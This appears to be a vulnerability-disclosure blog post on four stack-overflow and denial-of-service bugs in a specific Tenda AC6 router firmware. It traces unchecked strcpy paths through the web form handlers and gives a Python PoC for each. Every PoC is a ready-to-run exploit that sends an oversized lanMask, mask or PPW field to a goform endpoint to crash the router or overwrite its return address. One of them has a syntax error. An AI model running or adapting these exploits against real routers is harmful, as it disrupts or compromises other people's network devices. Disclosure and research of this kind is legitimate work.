ref:ac6_vulns_batch

Hello CVE auditer!

Here are some ac6 dos vuln point and pocs :p

thx

infected version

US_AC6V2.0RTL_V15.03.06.50_multi_TDE01.bin

Stack Overflow

fromAdvSetLanip(overflow arg:lanMask)

Vuln point

http://{target_ip}/goform/AdvSetLanip

Vulnerability analysis

We can find the webs form was defined in formDefineTendDa()

in fromAdvSetLanip(),we can control the cp and v11,and v13 is equal to the lan.ip value,which be used soon

then we just need to make v13 not equal to the lan.ip value,so that we can submit lanIp to some wired value ,such as “114.51.41.91”,etc

then we almost got there,we can find the v11(lanMask,user controlable)was transmit to the guest_ip_check function as argument 2

because the guest_ip_check() function a2 point to our controlable arg: lanMask,which can input infinite length words

initIpAddrInfo() also use our input as a2,however

we can clearly see that the a2 being strcpy into the a4 area directly,without any length check,it is dangerous for stack ra register,and where is the a4 area?

when we go back to guest_ip_check ,we can find that the a4 area is point to this function’s stack,which called v5

In summary,we need to commit these values:

“lanMask”: payload, “lanIp”: “114.51.41.91” (or something else:p)

PoC

def exp_AdvSetLanip(target_ip, cookie):
    url = f"http://{target_ip}/goform/AdvSetLanip"
    payload = b'a'*(0x30) + b'bbbb\x00'
    data = {
        "lanMask":payload,
        "lanIp": "114.5.14.19"
    }
    response = requests.post(url, cookies={'Cookie': cookie}, data=data)

Demo

setDoublePppoeConfig->guest_ip_check(overflow arg: mask)

Vuln point

http://{target_ip}/goform/WanParameterSetting

Vulnerability analysis

We can find the webs form was defined in formDefineTendDa()

in formWanParameterSetting(),it quote the formWanInfoSet() function,which we even not have to contorl the wan1 to get in(because the default value of module is wan1)

then,formWanInfoSet() have a control point which we can control the wanType argument into “5”,then the v3 will be (int)”5″

so that we can get in this brench,which call the vulnerable function setDoublePppoeConfig()

then we get into it

we need to control the vpnWanType = 0

then we can use staticIp to overflow the stack

because the guest_ip_check() function a2 point to our controlable arg: mask,which can input infinite length words

initIpAddrInfo() also use our input as a2,however

we can clearly see that the a2 being strcpy into the a4 area directly,without any length check,it is dangerous for stack ra register,and where is the a4 area?

when we go back to guest_ip_check ,we can find that the a4 area is point to this function’s stack,which called v5

In summary,we need to commit these values:

wanType:5 vpnWanType:0 mask:payload

PoC

def exp_setDoublePppoeConfig(target_ip, cookie):
    url = f"http://{target_ip}/goform/WanParameterSetting"
    payload = b'a'*(0x920) + b'bbbb\x00'
    data = {
       "wanType":5,
       "vpnWanType":0,
       "mask":payload
    }
    response = requests.post(url, cookies=cookie, data=data)

Demo

setDoubleL2tpConfig->guest_ip_check(overflow arg: mask)

Vuln point

http://{target_ip}/goform/formWanParameterSetting

Vulnerability analysis

We can find the webs form was defined in formDefineTendDa()

in formWanParameterSetting(),it quote the formWanInfoSet() function,which we even not have to contorl the wan1 to get in(because the default value of module is wan1)

then,formWanInfoSet() have a control point which we can control the wanType argument into “4”,then the v3 will be (int)”4″

so that we can get in this brench,which call the vulnerable function setDoubleL2tpConfig()

then we get into it

we need to control the vpnWanType(v11) = 0,and v7(mask) which is delived to guest_ip_check()

then we can use staticIp to overflow the stack

because the guest_ip_check() function a2 point to our controlable arg: mask,which can input infinite length words

initIpAddrInfo() also use our input as a2,however

we can clearly see that the a2 being strcpy into the a4 area directly,without any length check,it is dangerous for stack ra register,and where is the a4 area?

when we go back to guest_ip_check ,we can find that the a4 area is point to this function’s stack,which called v5

PoC

def exp_setDoubleL2tpConfig(target_ip, cookie):
    url = f"http://{target_ip}/goform/WanParameterSetting"
    payload = b'a'*(0x920) + b'bbbb\x00'
    data = {
       "wanType":4  
       "vpnWanType":0
       "mask":payload
    }
    response = requests.post(url, cookies={'Cookie': cookie}, data=data)

Demo

fromWizardHandle(dos)

Vuln point

http://{target_ip}/goform/WizardHandle

Vulnerability analysis

We can find the webs form was defined in formDefineTendDa()

case2 get var from web request value:PPW

then commit PPW pointer to decodePwd

decodePwd just a danger designed function,which copy allthings in a1 to a2 without checking length

so the v54 stack area is in danger,we can use PPW to overflow it

however,here are so many valuable block between the overflow value and ra

and we overflow the a0 place,which need point to a valid number ascii word to delieve to the atoi first argument

so atoi will be fially segmentation fault

Poc

def exp_WizardHandle(target_ip, cookie):
    url = f"http://{target_ip}/goform/WizardHandle"
    payload = b'\x76'*(0x16C) + b'bbbb\x00'
    data = {
        "WANT":2,
        "PPW": payload
    }
    response = requests.post(url, cookies={'Cookie': cookie}, data=data)

Demo

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇
粤ICP备20015830号